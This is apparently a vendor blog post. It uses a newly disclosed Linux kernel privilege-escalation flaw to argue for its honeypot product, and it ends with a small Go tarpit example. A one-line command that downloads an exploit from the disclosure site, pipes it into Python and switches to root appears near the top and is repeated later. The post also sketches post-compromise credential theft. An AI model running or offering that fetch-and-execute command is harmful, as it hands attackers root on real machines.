Tools: Update: Copy Fail is 732 bytes. Your foothold problem is the bigger one.

Patch the kernel. Of course. Then drown them at the door.

CVE-2026-31431 dropped this week. The disclosure site is at copy.fail and the writeup is short enough to read with coffee. The TL;DR: a logic flaw in the kernel's authencesn path, reachable through AF_ALG sockets, abused via splice() to land a 4-byte write into the page cache of any setuid binary. They picked /usr/bin/su for the demo. The whole exploit is 732 bytes of Python 3 standard library. No race window. No kernel offsets. Reliable across every affected distro from 2017 onward. Root shell. The kernel hands it over because AF_ALG is on by default and authencesn does the wrong thing under splice().

$ curl https://copy.fail/exp | python3 && su #

The bit nobody is talking about

Copy Fail is a local privilege escalation. The attacker still needs an unprivileged shell on your box to fire it. That shell doesn't come from your hardened SSH. It comes from the WordPress plugin you forgot was installed. The Grafana on :3000. The Jenkins your CI team spun up two years ago. The leaked GitHub PAT in a public gist. The n-day on your firewall vendor that everyone is still patching.

They land as www-data. They run the 732-byte one-liner. They're root. Backdoor in /etc/cron.d/. known_hosts dumped. AWS keys pulled from ~/.aws/credentials. Your Ansible inventory is now their target list. Friday they're inside. Sunday they push. Monday your /home is on a leak site and you're explaining to legal why prod creds lived on a Jenkins worker.

What we actually see

I run TarPit.pro. It's a honeypot that answers on the ports your real services listen on, hands attackers a believable banner, then tarpits and bans them. Across 5 boxes in the last 20 days:

- ~40,000 attack attempts
- ~14,000 unique source IPs
- ~5,000 IPs auto banned
- Top ports hit: SSH (14k), Telnet (3.2k), SMB (2.2k)
- Top sources: US, China, UK, Hong Kong, Netherlands

That's the foothold market. Those are the IPs that, in another month, will be the ones running curl copy.fail/exp | python3 on whichever box they land on first.

You're going to patch. Distros are already shipping fixes. The next CVE is already being written though, and the foothold pipeline doesn't care which kernel you're running. A honeypot doesn't replace patching. It buys you the one thing you can't get anywhere else: the brute forcer wastes their session on a fake SSH that never lets them in, gets banned across your fleet on the first connection and never reaches the box where Copy Fail or whatever comes next would have actually mattered.

Try it free: https://tarpit.pro

Single Go binary, systemd, fake banners on 70+ services, fleet-wide bans across your servers. Free tier covers up to 2 servers with the cloud dashboard. Coupon LAUNCH101 gives 2 months free on Starter or Pro.
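The two moving parts of the tarpit described above, as an added Go example that is not TarPit.pro's own code: a fake SSH banner dripped one byte at a time so the session goes nowhere, and a fleet-shared hit list that bans a source on its first contact and drops every later connection from it. The listen address, the banner string and the per-byte delay are assumed for the demo.

```go
package main

import (
	"log"
	"net"
	"time"
)

// Constructed SSH banner for the demo port (not TarPit.pro's own banner set).
const sshBanner = "SSH-2.0-OpenSSH_9.2p1 Debian-2+deb12u2\r\n"
// BanList is the per-source hit count the whole fleet shares; any source seen before is banned.
type BanList map[string]int
// Record counts one hit from ip and reports whether ip was already banned before it.
func (b BanList) Record(ip string) bool {
	seen := b[ip] > 0 // ban on first contact, as the post describes
	b[ip]++
	return seen
}
// Tarpit drips the banner one byte per delay, so the attacker's session is spent
// on a service that never lets anyone in. It returns the number of bytes sent.
func Tarpit(conn net.Conn, banner string, delay time.Duration) int {
	defer conn.Close()
	for i := 0; i < len(banner); i++ {
		if _, err := conn.Write([]byte{banner[i]}); err != nil {
			return i
		}
		time.Sleep(delay)
	}
	return len(banner)
}

func main() {
	bans := BanList{}
	ln, err := net.Listen("tcp", "127.0.0.1:2222") // stands in for :22 in this demo
	if err != nil {
		log.Fatal(err)
	}
	for {
		conn, err := ln.Accept()
		if err != nil {
			return
		}
		ip, _, _ := net.SplitHostPort(conn.RemoteAddr().String())
		if bans.Record(ip) { // already banned: drop it, no banner, no tarpit
			conn.Close()
			continue
		}
		go Tarpit(conn, sshBanner, 2*time.Second)
	}
}
```

In a real deployment the BanList would be shared across nodes and guarded by a lock; here a single accept loop owns it, so no mutex is needed.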